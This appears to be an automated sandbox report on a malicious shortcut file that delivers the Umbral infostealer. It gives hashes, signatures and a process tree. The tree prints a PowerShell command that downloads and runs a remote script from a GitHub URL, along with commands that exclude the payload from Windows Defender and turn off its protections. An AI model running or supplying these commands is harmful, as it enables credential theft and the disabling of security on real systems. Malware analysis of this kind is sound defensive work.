Analysis
-
max time kernel
103s -
max time network
138s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system -
submitted
23/03/2025, 14:59
Static task
static1
General
-
Target
chrome passwords.txt.lnk
-
Size
2KB
-
MD5
47668567f79882bddc96a52bc6c1fc89
-
SHA1
7d0e69cff74fb5bd0e58d494c3f5eab815703f4d
-
SHA256
2599b76e8efb52c183e141c5bbd92da2aefd767295b8579a40442415c8b7061a
-
SHA512
71e57e3c278611e7f27d1fc4338297f04946f6e2dced678fdd05541f33524ee3d6c635a24e27f03e20064f8a9496f212b02193a241e3627b0b286d8d71c9cf5f
Malware Config
Signatures
-
Detect Umbral payload 2 IoCs
resource yara_rule behavioral1/files/0x0008000000024080-19.dat family_umbral behavioral1/memory/1068-29-0x000001FF23A80000-0x000001FF23AC0000-memory.dmp family_umbral -
Umbral family
-
Blocklisted process makes network request 2 IoCs
flow pid Process 7 4148 powershell.exe 11 4148 powershell.exe -
pid Process 4148 powershell.exe 2532 powershell.exe 3428 powershell.exe 392 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Control Panel\International\Geo\Nation cmd.exe -
Executes dropped EXE 1 IoCs
pid Process 1068 Umbral.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
flow ioc 6 raw.githubusercontent.com 7 raw.githubusercontent.com 37 discord.com 38 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 35 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 3780 wmic.exe -
Suspicious behavior: EnumeratesProcesses 8 IoCs
pid Process 4148 powershell.exe 4148 powershell.exe 2532 powershell.exe 2532 powershell.exe 3428 powershell.exe 3428 powershell.exe 392 powershell.exe 392 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4148 powershell.exe Token: SeDebugPrivilege 1068 Umbral.exe Token: SeDebugPrivilege 2532 powershell.exe Token: SeDebugPrivilege 3428 powershell.exe Token: SeIncreaseQuotaPrivilege 1840 wmic.exe Token: SeSecurityPrivilege 1840 wmic.exe Token: SeTakeOwnershipPrivilege 1840 wmic.exe Token: SeLoadDriverPrivilege 1840 wmic.exe Token: SeSystemProfilePrivilege 1840 wmic.exe Token: SeSystemtimePrivilege 1840 wmic.exe Token: SeProfSingleProcessPrivilege 1840 wmic.exe Token: SeIncBasePriorityPrivilege 1840 wmic.exe Token: SeCreatePagefilePrivilege 1840 wmic.exe Token: SeBackupPrivilege 1840 wmic.exe Token: SeRestorePrivilege 1840 wmic.exe Token: SeShutdownPrivilege 1840 wmic.exe Token: SeDebugPrivilege 1840 wmic.exe Token: SeSystemEnvironmentPrivilege 1840 wmic.exe Token: SeRemoteShutdownPrivilege 1840 wmic.exe Token: SeUndockPrivilege 1840 wmic.exe Token: SeManageVolumePrivilege 1840 wmic.exe Token: 33 1840 wmic.exe Token: 34 1840 wmic.exe Token: 35 1840 wmic.exe Token: 36 1840 wmic.exe Token: SeIncreaseQuotaPrivilege 1840 wmic.exe Token: SeSecurityPrivilege 1840 wmic.exe Token: SeTakeOwnershipPrivilege 1840 wmic.exe Token: SeLoadDriverPrivilege 1840 wmic.exe Token: SeSystemProfilePrivilege 1840 wmic.exe Token: SeSystemtimePrivilege 1840 wmic.exe Token: SeProfSingleProcessPrivilege 1840 wmic.exe Token: SeIncBasePriorityPrivilege 1840 wmic.exe Token: SeCreatePagefilePrivilege 1840 wmic.exe Token: SeBackupPrivilege 1840 wmic.exe Token: SeRestorePrivilege 1840 wmic.exe Token: SeShutdownPrivilege 1840 wmic.exe Token: SeDebugPrivilege 1840 wmic.exe Token: SeSystemEnvironmentPrivilege 1840 wmic.exe Token: SeRemoteShutdownPrivilege 1840 wmic.exe Token: SeUndockPrivilege 1840 wmic.exe Token: SeManageVolumePrivilege 1840 wmic.exe Token: 33 1840 wmic.exe Token: 34 1840 wmic.exe Token: 35 1840 wmic.exe Token: 36 1840 wmic.exe Token: SeIncreaseQuotaPrivilege 2424 wmic.exe Token: SeSecurityPrivilege 2424 wmic.exe Token: SeTakeOwnershipPrivilege 2424 wmic.exe Token: SeLoadDriverPrivilege 2424 wmic.exe Token: SeSystemProfilePrivilege 2424 wmic.exe Token: SeSystemtimePrivilege 2424 wmic.exe Token: SeProfSingleProcessPrivilege 2424 wmic.exe Token: SeIncBasePriorityPrivilege 2424 wmic.exe Token: SeCreatePagefilePrivilege 2424 wmic.exe Token: SeBackupPrivilege 2424 wmic.exe Token: SeRestorePrivilege 2424 wmic.exe Token: SeShutdownPrivilege 2424 wmic.exe Token: SeDebugPrivilege 2424 wmic.exe Token: SeSystemEnvironmentPrivilege 2424 wmic.exe Token: SeRemoteShutdownPrivilege 2424 wmic.exe Token: SeUndockPrivilege 2424 wmic.exe Token: SeManageVolumePrivilege 2424 wmic.exe Token: 33 2424 wmic.exe -
Suspicious use of WriteProcessMemory 18 IoCs
description pid Process procid_target PID 4664 wrote to memory of 4148 4664 cmd.exe 87 PID 4664 wrote to memory of 4148 4664 cmd.exe 87 PID 4148 wrote to memory of 1068 4148 powershell.exe 93 PID 4148 wrote to memory of 1068 4148 powershell.exe 93 PID 1068 wrote to memory of 2532 1068 Umbral.exe 96 PID 1068 wrote to memory of 2532 1068 Umbral.exe 96 PID 1068 wrote to memory of 3428 1068 Umbral.exe 98 PID 1068 wrote to memory of 3428 1068 Umbral.exe 98 PID 1068 wrote to memory of 1840 1068 Umbral.exe 100 PID 1068 wrote to memory of 1840 1068 Umbral.exe 100 PID 1068 wrote to memory of 2424 1068 Umbral.exe 102 PID 1068 wrote to memory of 2424 1068 Umbral.exe 102 PID 1068 wrote to memory of 3896 1068 Umbral.exe 105 PID 1068 wrote to memory of 3896 1068 Umbral.exe 105 PID 1068 wrote to memory of 392 1068 Umbral.exe 107 PID 1068 wrote to memory of 392 1068 Umbral.exe 107 PID 1068 wrote to memory of 3780 1068 Umbral.exe 109 PID 1068 wrote to memory of 3780 1068 Umbral.exe 109
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\chrome passwords.txt.lnk"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4664 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Invoke-Expression (Invoke-WebRequest -Uri 'https://raw.githubusercontent.com/sigmanip/reallogs123fr/refs/heads/main/download_and_run.ps1' -UseBasicParsing).Content"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4148 -
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1068 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2532
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 24⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3428
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1840
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2424
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid4⤵PID:3896
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:392
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name4⤵
- Detects videocard installed
PID:3780
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5556084f2c6d459c116a69d6fedcc4105
SHA1633e89b9a1e77942d822d14de6708430a3944dbc
SHA25688cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8
SHA5120f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e
-
Filesize
1KB
MD500a38b7d5c1d79d8ac4b676c44879b17
SHA10e54bec9c3feecd66563c879872f2f28b2f7d35a
SHA256ef7e0a8869cc2c16d9e48be2810d4f2aaf4d8fb5a6076666009ff714b8a417f3
SHA512cb771f0e9ee51e08417f1d5779d5fcde8af8299a98fb131f3a038a4fdc0495b7dcfeb52bbe480d5c532131834ec06f3f1f4cdf5352a15e5a39c142ea7dc58550
-
Filesize
944B
MD5e1998d7d07a2cde3ba7241ee388b36c2
SHA1c229adffd103824362426c4e3103b7b415426990
SHA256effdbc6b49698dd85890627cdc91b8594c7ebb0f43cead36843f949a9fa4358b
SHA5125f0a2b70935ef9d3ef55f32904588d584d1e0fe8d9e0bba1b763304a1b71b2d99c5bf6cfe8327b4505a26cc3f8c72c1946ebc702c998499cce21fa7a84315720
-
Filesize
948B
MD5c65738617888921a153bd9b1ef516ee7
SHA15245e71ea3c181d76320c857b639272ac9e079b1
SHA2564640ba4001fd16a593315299cbdd4988dc2c7075820687f1018aac40aca95c26
SHA5122e2a0ebd93f9d8dd07a7599054bce232683e9add9a35e77b584618040bcfd84a42545352519ec4736cc379002210b6f3ed2d905591c6925c0981b0392b495bfa
-
Filesize
227KB
MD568b35208a6ccc5cf6cfa41f86712e7ab
SHA134c735c3cc8fd7f9d225cd7323e5632aa772f465
SHA2564a7c61f2655323ab50ae5d82063c96f5f8bad0ea39c0e6895b6354668b425279
SHA512f05d7f10ee0a9ebef78696c86ec8f973242aafba3004cd6ee753b8ca44916b898befcca907b27ec711db60bb5141dc57cf36a00545cf4253136e1ecb63194f3f
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82